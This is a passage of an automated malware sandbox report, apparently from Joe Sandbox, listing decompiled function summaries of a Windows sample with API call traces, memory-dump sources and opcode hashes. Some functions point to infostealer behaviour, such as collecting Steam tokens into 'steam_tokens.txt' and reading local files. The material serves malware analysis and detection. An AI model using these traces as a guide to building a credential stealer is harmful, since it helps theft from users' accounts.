                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FolderPathlstrcpy
                              • String ID:
                              • API String ID: 818526691-0
                              • Opcode ID: 91f265d21227da6d44e2ca10f7f1bf07d9724bfbdc44b56604bf1784c954f64e
                              • Instruction ID: d9726ff4bba3f15c3136bd2da72db283d502e38b306bd98e2d267033622d76a6
                              • Opcode Fuzzy Hash: 91f265d21227da6d44e2ca10f7f1bf07d9724bfbdc44b56604bf1784c954f64e
                              • Instruction Fuzzy Hash: C441C971910218AFCB21EB64DC45FED77B8FF48300F005899FB56A7245DA749E44DB50
                              APIs
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E4ECDF
                              • lstrlen.KERNEL32(00000000), ref: 00E4ECF6
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4ED1D
                              • lstrlen.KERNEL32(00000000), ref: 00E4ED24
                              • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 00E4ED52
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID: steam_tokens.txt
                              • API String ID: 367037083-401951677
                              • Opcode ID: 0e64b9619bb9a51c7191c9afc6e08949f614d211c4b741ed0b1f8bdeb3f3c21f
                              • Instruction ID: 29374b7cd95478214a887eba4746d93ccb15ffc1e09a6670bdcb36672018da89
                              • Opcode Fuzzy Hash: 0e64b9619bb9a51c7191c9afc6e08949f614d211c4b741ed0b1f8bdeb3f3c21f
                              • Instruction Fuzzy Hash: 8F316731A102445BC722BB78E84AA6E7BE8AF40304F056528FA86FB312DA24DC0687D1
                              APIs
                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,00E3140E), ref: 00E39A9A
                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00E3140E), ref: 00E39AB0
                              • LocalAlloc.KERNEL32(00000040,?,?,?,?,00E3140E), ref: 00E39AC7
                              • ReadFile.KERNEL32(00000000,00000000,?,00E3140E,00000000,?,?,?,00E3140E), ref: 00E39AE0
                              • LocalFree.KERNEL32(?,?,?,?,00E3140E), ref: 00E39B00
                              • CloseHandle.KERNEL32(00000000,?,?,?,00E3140E), ref: 00E39B07
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: 7dc950736d66ee872b7512723612da0a0fc4aeb70e2d4b240efb2ad984cd2c36
                              • Instruction ID: 47eccbe2f33d8a54f75d467076e6ed2c3d3f62be2a1fbfb52a3400925f5f6001
                              • Opcode Fuzzy Hash: 7dc950736d66ee872b7512723612da0a0fc4aeb70e2d4b240efb2ad984cd2c36
                              • Instruction Fuzzy Hash: 7E112171600209AFE720DF69DC88AABB76CEB04748F105259F911A6281D7759D50CBA4
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 00E55B14
                                • Part of subcall function 00E5A173: std::exception::exception.LIBCMT ref: 00E5A188
                                • Part of subcall function 00E5A173: std::exception::exception.LIBCMT ref: 00E5A1AE
                              • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00E55B7C
                              • memmove.MSVCRT(00000000,?,?), ref: 00E55B89
                              • memmove.MSVCRT(00000000,?,?), ref: 00E55B98
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                              • String ID: vector<T> too long
                              • API String ID: 2052693487-3788999226
                              • Opcode ID: 0bd0badcc13e1cedd5fdf2d3efb982fa4007bfb27a51e45ebcebd4d9b34e4a52
                              • Instruction ID: 06c9a25b63d42a8586fca681a99faf15fc40d0601dd166c09721ff51cb37f570
                              • Opcode Fuzzy Hash: 0bd0badcc13e1cedd5fdf2d3efb982fa4007bfb27a51e45ebcebd4d9b34e4a52
                              • Instruction Fuzzy Hash: 5B417372B006199FCF08DF6CC995AAEBBF5EB88311F158629E915E7384E630DD04CB90
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: String___crt$Typememset
                              • String ID:
                              • API String ID: 3530896902-3916222277
                              • Opcode ID: 23cf2abcf371d0071783cd0d6f6a9183f21c7c35f848ec96eb468076ee81956a
                              • Instruction ID: ac3333cf0b167a64bda45d2e986a3629b78199076604c1af4a06b616ad79b798
                              • Opcode Fuzzy Hash: 23cf2abcf371d0071783cd0d6f6a9183f21c7c35f848ec96eb468076ee81956a
                              • Instruction Fuzzy Hash: 3C41187450475CDEDB318B249D85FFB7BFC9B45309F1458E8ED86A6183E2719A488F20
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 00E47D58
                                • Part of subcall function 00E5A1C0: std::exception::exception.LIBCMT ref: 00E5A1D5
                                • Part of subcall function 00E5A1C0: std::exception::exception.LIBCMT ref: 00E5A1FB
                              • std::_Xinvalid_argument.LIBCPMT ref: 00E47D76
                              • std::_Xinvalid_argument.LIBCPMT ref: 00E47D91
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Xinvalid_argumentstd::_$std::exception::exception
                              • String ID: invalid string position$string too long
                              • API String ID: 3310641104-4289949731
                              • Opcode ID: 9368af17c80fa12193432c165bc438a013914e83132cbb78206fb0267811a7c6
                              • Instruction ID: 5b8def6a697a9717b2c02d1ad171eb81fb07b9a94016fb11b81e4ce105c5704a
                              • Opcode Fuzzy Hash: 9368af17c80fa12193432c165bc438a013914e83132cbb78206fb0267811a7c6
                              • Instruction Fuzzy Hash: F621E4727187004BD720DE6CF880A3AB7E5EFA2754F245A6EE482AB281D770DC0487E1
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E533EF
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00E533F6
                              • GlobalMemoryStatusEx.KERNEL32 ref: 00E53411
                              • wsprintfA.USER32 ref: 00E53437
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB
                              • API String ID: 2922868504-2651807785
                              • Opcode ID: fd9af2458afc4ecfe0172952c000fbf3467ce5fd8f7a22128314c26a0a0ca645
                              • Instruction ID: 47a66abc6227b5bfaef463c196da75d3131d1ba3612817173de5f1d3a0be864a
                              • Opcode Fuzzy Hash: fd9af2458afc4ecfe0172952c000fbf3467ce5fd8f7a22128314c26a0a0ca645
                              • Instruction Fuzzy Hash: 74012871A04214AFDB24DFA8DD49BAEB7B8FB44715F000629FE06E7380D779590087A1
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlenmemset
                              • String ID:
                              • API String ID: 3212139465-0
                              • Opcode ID: ed9557cbcc063b88b89428a0309fb7b26a5f3293d44370e0ebde0d2baba51d54
                              • Instruction ID: 1d9422370148cc6d3e7fe0fb72284a1157c7ebba0cb6cebc15a4a406d38e95f9
                              • Opcode Fuzzy Hash: ed9557cbcc063b88b89428a0309fb7b26a5f3293d44370e0ebde0d2baba51d54
                              • Instruction Fuzzy Hash: A98122B1E003059BDB14CF94D844BAEB7B5EF8530AF24986DEA08B7381E7759D49CB90
                              APIs
                              • lstrlen.KERNEL32(00000000), ref: 00E47F31
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E47F60
                              • StrCmpCA.SHLWAPI(00000000,00E64C3C), ref: 00E47FA5
                              • StrCmpCA.SHLWAPI(00000000,00E64C3C), ref: 00E47FD3
                              • StrCmpCA.SHLWAPI(00000000,00E64C3C), ref: 00E48007
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 46073b004590d022dc0c3d54c5037c3b273d3057e6b1b3b3bd1f3f0c81ff4025
                              • Instruction ID: ca74cb793452b0fa0864d14db632f56bb172c4cf9215de7825eb9880fcef9bbb
                              • Opcode Fuzzy Hash: 46073b004590d022dc0c3d54c5037c3b273d3057e6b1b3b3bd1f3f0c81ff4025
                              • Instruction Fuzzy Hash: 3541D03060821ADFDB20DF68E480EAEB7B4FF54304F115189E845EB351DB71AA6ACBD1
                              APIs
                              • lstrlen.KERNEL32(00000000), ref: 00E480BB
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E480EA
                              • StrCmpCA.SHLWAPI(00000000,00E64C3C), ref: 00E48102
                              • lstrlen.KERNEL32(00000000), ref: 00E48140
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4816F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: fcab34c5bcfb747ece605dd144d708a8987923d6aef8ba46e91a3291480db3be
                              • Instruction ID: 64c18d6dc5235a8b9bef9333990a5f034a50d873f150436a53e71efeef19b5bc
                              • Opcode Fuzzy Hash: fcab34c5bcfb747ece605dd144d708a8987923d6aef8ba46e91a3291480db3be
                              • Instruction Fuzzy Hash: 49418E71600206DFDB21DF68EA48BAEBBF4EF44304F10945EE98AE7244EB34D945CB90
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 00E51B72
                                • Part of subcall function 00E51820: lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E5184F
                                • Part of subcall function 00E51820: lstrlen.KERNEL32(00D16EC8), ref: 00E51860
                                • Part of subcall function 00E51820: lstrcpy.KERNEL32(00000000,00000000), ref: 00E51887
                                • Part of subcall function 00E51820: lstrcat.KERNEL32(00000000,00000000), ref: 00E51892
                                • Part of subcall function 00E51820: lstrcpy.KERNEL32(00000000,00000000), ref: 00E518C1
                                • Part of subcall function 00E51820: lstrlen.KERNEL32(00E64FA0), ref: 00E518D3
                                • Part of subcall function 00E51820: lstrcpy.KERNEL32(00000000,00000000), ref: 00E518F4
                                • Part of subcall function 00E51820: lstrcat.KERNEL32(00000000,00E64FA0), ref: 00E51900
                                • Part of subcall function 00E51820: lstrcpy.KERNEL32(00000000,00000000), ref: 00E5192F
                              • sscanf.NTDLL ref: 00E51B9A
                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00E51BB6
                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00E51BC6
                              • ExitProcess.KERNEL32 ref: 00E51BE3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
